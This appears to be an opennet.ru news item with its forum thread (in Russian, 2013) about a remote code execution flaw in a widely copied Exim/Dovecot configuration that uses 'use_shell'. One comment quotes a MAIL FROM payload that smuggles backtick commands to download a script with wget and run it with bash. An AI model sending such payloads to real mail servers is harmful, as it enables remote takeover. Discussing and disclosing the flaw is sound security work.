https://m.opennet.dev/openforum/vsluhforumID3/89882.html В рекомендованном (http://wiki.dovecot.org/LDA/Exim?action=recall&rev=16) на wiki-сайте проекта и в некоторых других руководствах примере настройки связки почтового сервера Exim с IMAP/POP3-сервером Dovecot выявлена критическая уязвимость (https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution), позволяющая выполнить произвольный код на сервере. Уязвимость может быть эксплуатирована через отправку письма со специальным образом оформленным адресом отправителя. Проблема проявляется только в системах, в которых в конфигурации Exim указана опция "use_shell" в блоке подключения Dovecot. <br><br><br>Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства. Всем пользователям связки Exim и Dovecot рекомендуется проверить настройки на предмет отсутствия опции "use_shell", при включении которой агент доставки запускается с использованием https://m.opennet.dev/openforum/vsluhforumID3/89882.html#67 Wed, 08 May 2013 08:45:28 GMT Редко применяется, так как во многихдистрибутивах во время апгрейда пакетов запускаются постинстал скрипты из /tmp<br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#66 Tue, 07 May 2013 20:28:27 GMT &gt; Ну дык: <br>&gt;&gt; MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com <br>&gt; А то всё, NULL-pointers, SQL-inject, array-bounds, race-conditions, double-free, скукотища... <br>&gt; :D <br><br>Да, ты прав, это действительно новое слово в науке и технике, свежая струя так сказать...<br><br>:-)))<br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#65 Mon, 06 May 2013 19:20:11 GMT &gt; как дети чесслово. шеллы какие-то, эскейпирование.<br>&gt; учитесь, как настоящие энтерпрайзные дырки в почте делать-то надо <br><br>Нет, Только bash! Ленин завещал учиться, но до до джаввы же.<br><br>&gt; "The IBM Notes mail client accepts Java applet tags and JavaScript tags https://m.opennet.dev/openforum/vsluhforumID3/89882.html#64 Mon, 06 May 2013 16:31:56 GMT а вот спорим, что вы сами никогда реальный почтовый сервер не поднимали...<br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#63 Mon, 06 May 2013 15:13:43 GMT &gt; ПИН-код на кредитке фломастером не пишешь? :) <br><br>Неа :)<br><br>Я всего лишь пытаюсь донести до общественности простую мысль, что на большинстве хостов, настроенных конфиг-киддизами по популярным гогно-руководствам, можно обнаружить массу презабавнейшего - от тупо дефолтного до адвансед-кривого бай дезигн "по рекомендациям от лучших собаководов".<br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#62 Mon, 06 May 2013 14:57:53 GMT &gt; BMW Z4 - машина.<br>&gt; BMW Z4 в пос. Кукуево - понты граничащие с маразмом.<br><br>BMW Z4 в придорожном столбе (вследствие неумения обращаться с) - источник лулзов :) <br>Впрочем, как и экзим с довекотом, да и почти любой другой софт.<br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#61 Mon, 06 May 2013 12:29:57 GMT &gt;&gt; Да нет там рута! Там есть привилегии и контекст.<br>&gt; При установке мускля автоматом создается юзер БД root с пустым паролем и <br>&gt; полными привилегиями, включая грант, на таблицу mysql. Так что, я б <br>&gt; поостерегся делать скоропалительные заявления.<br><br>ПИН-код на кредитке фломастером не пишешь? :)<br><br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#60 Mon, 06 May 2013 12:27:35 GMT BMW Z4 - машина.<br>BMW Z4 в пос. Кукуево - понты граничащие с маразмом.<br><br> https://m.opennet.dev/openforum/vsluhforumID3/89882.html#59 Mon, 06 May 2013 09:13:33 GMT а как же noexec в /tmp ?<br>